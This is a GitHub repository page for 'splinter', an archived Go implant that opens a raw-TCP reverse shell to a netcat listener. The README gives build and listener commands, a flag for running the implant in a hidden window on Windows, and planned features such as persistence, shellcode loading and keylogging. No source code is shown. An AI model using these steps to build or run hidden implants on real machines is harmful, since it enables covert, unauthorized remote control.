Skip to content
This repository has been archived by the owner on Apr 29, 2024. It is now read-only.
/ splinter Public archive

A implant I am designing to work with netcat. Uses unencrypterd raw TCP.

Notifications You must be signed in to change notification settings

fistfulofhummus/splinter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Splinter

A implant I am designing to work with netcat.

Usage/Examples

Before building the implant don't forget to edit the code and insert your TCP listner address.

git clone https://github.com/fistfulofhummus/splinter.git
go build
nc -nlvp port

Use go build -ldflags -H=windowsgui if you want the implant to run in a hidden window. Now just execute the implant on a Windows machine. If you want to terminate execution cleanly, type stop into your netcat terminal.

TO-DO

  • Add a menu a la meterpreter
  • cd
  • ls
  • pwd
  • Load and execute shellcode
  • Upload/Download
  • Persistence
  • Keylogging
  • RickRoll
  • Use Go Routines whenever possible

Notes:

I will not be responsible for any illegal activity conducted with this code. The implant uses raw TCP. OPSEC is a non-concern in this project. IDS/IPS systems should sniff it out.

About

A implant I am designing to work with netcat. Uses unencrypterd raw TCP.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages